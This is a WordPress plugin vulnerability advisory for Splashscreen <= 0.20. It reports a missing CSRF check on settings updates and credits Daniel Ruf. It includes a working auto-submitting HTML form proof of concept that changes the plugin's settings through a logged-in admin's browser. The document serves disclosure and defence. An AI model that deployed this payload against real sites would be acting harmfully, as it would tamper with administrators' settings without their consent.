WordPress Plugin Vulnerabilities
Splashscreen <= 0.20 - Settings Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<form action="https://example.com/wp-admin/options-general.php?page=splashscreen.php" method="POST"> <input type="text" name="splashscreen_type" value="dGVtcGxhdGUuaHRt"> <input type="text" name="splashscreen_excludedpaths" value=""> <input type="text" name="splashscreen_submit" value="Update"> </form> <script> document.forms[0].submit(); </script>
Affects Plugins
References
Classification
Type
CSRF
OWASP top 10
CWE
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-01-19 (about 3 months ago)
Added
2024-01-19 (about 3 months ago)
Last Updated
2024-01-19 (about 3 months ago)